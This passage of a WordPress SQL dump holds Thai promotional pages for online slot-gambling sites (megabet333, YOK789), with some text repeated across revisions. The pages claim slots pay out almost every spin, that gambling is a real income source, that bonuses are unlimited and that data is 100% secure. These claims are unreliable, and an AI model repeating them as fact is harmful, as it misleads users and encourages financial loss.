เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>สล็อตแตกง่าย megabet333 ระบบเสถียร การให้บริการพรีเมี่ยมต่อเนื่อง 24 ชม. </h2> <p>เว็บเล่นเกมที่พร้อมให้บริการตลอด 24 ชั่วโมง <b>megabet333 </b>สนุกได้แบบเต็มที่ ออกแบบมาเพื่อให้สมาชิกทุกคนรู้สึกเหมือนอยู่ในคาสิโนจริง ทีมงานซัพพอร์ตมืออาชีพพร้อมดูแลตลอด 24 ชั่วโมง ไม่ว่าจะเป็นการแก้ปัญหาเรื่องการฝากถอน การรับโบนัส หรือคำถามทั่วไปเกี่ยวกับเกม ผู้เล่นสามารถติดต่อได้ทุกช่องทางทั้งแชทสด ไลน์ หรือระบบอีเมล ซึ่งตอบกลับไวภายในไม่กี่นาทีเท่านั้น ใช้เทคโนโลยี SSL Encryption ที่เทียบเท่ามาตรฐานเว็บคาสิโนระดับโลก ทำให้ข้อมูลของผู้เล่นทั้งหมดถูกเก็บเป็นความลับปลอดภัยจากการโจมตีและการรั่วไหลของข้อมูล 100% มีทีมเทคนิคที่คอยตรวจสอบและอัปเดตระบบให้พร้อมใช้งานอยู่เสมอ ไม่ว่าจะกลางวันหรือกลางคืน เว็บยังคงให้บริการได้แบบไม่มีหยุดพักเพื่อให้ผู้เล่นมั่นใจได้ว่าทุกการเข้าเล่นจะได้รับประสบการณ์ที่ดีที่สุดอย่างต่อเนื่อง อยากสนุกแบบราบรื่นต้องที่นี่ที่เดียว</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 05:31:35','2026-02-24 05:31:35','',44,'https://yok789ss.com/?p=299',0,'revision','',0),(300,3,'2026-02-24 05:31:35','2026-02-24 05:31:35','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <a href=\"https://amb18b.com/\"><b>megabet333 </b></a>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>เว็บสล็อตค่ายใหญ่ megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ <strong><a href=\"http://mgbline.com\" target=\"_blank\" rel=\"noopener\">Line Official</a></strong> และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ปั่นสล็อต\nลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>สล็อตแตกง่าย megabet333 ระบบเสถียร การให้บริการพรีเมี่ยมต่อเนื่อง 24 ชม. </h2> <p>เว็บเล่นเกมที่พร้อมให้บริการตลอด 24 ชั่วโมง <b>megabet333 </b>สนุกได้แบบเต็มที่ ออกแบบมาเพื่อให้สมาชิกทุกคนรู้สึกเหมือนอยู่ในคาสิโนจริง ทีมงานซัพพอร์ตมืออาชีพพร้อมดูแลตลอด 24 ชั่วโมง ไม่ว่าจะเป็นการแก้ปัญหาเรื่องการฝากถอน การรับโบนัส หรือคำถามทั่วไปเกี่ยวกับเกม ผู้เล่นสามารถติดต่อได้ทุกช่องทางทั้งแชทสด ไลน์ หรือระบบอีเมล ซึ่งตอบกลับไวภายในไม่กี่นาทีเท่านั้น ใช้เทคโนโลยี SSL Encryption ที่เทียบเท่ามาตรฐานเว็บคาสิโนระดับโลก ทำให้ข้อมูลของผู้เล่นทั้งหมดถูกเก็บเป็นความลับปลอดภัยจากการโจมตีและการรั่วไหลของข้อมูล 100% มีทีมเทคนิคที่คอยตรวจสอบและอัปเดตระบบให้พร้อมใช้งานอยู่เสมอ ไม่ว่าจะกลางวันหรือกลางคืน เว็บยังคงให้บริการได้แบบไม่มีหยุดพักเพื่อให้ผู้เล่นมั่นใจได้ว่าทุกการเข้าเล่นจะได้รับประสบการณ์ที่ดีที่สุดอย่างต่อเนื่อง อยากสนุกแบบราบรื่นต้องที่นี่ที่เดียว</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 05:31:35','2026-02-24 05:31:35','',44,'https://yok789ss.com/?p=300',0,'revision','',0),(301,3,'2026-02-24 05:31:35','2026-02-24 05:31:35','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน YOK789 เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>YOK789 ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม 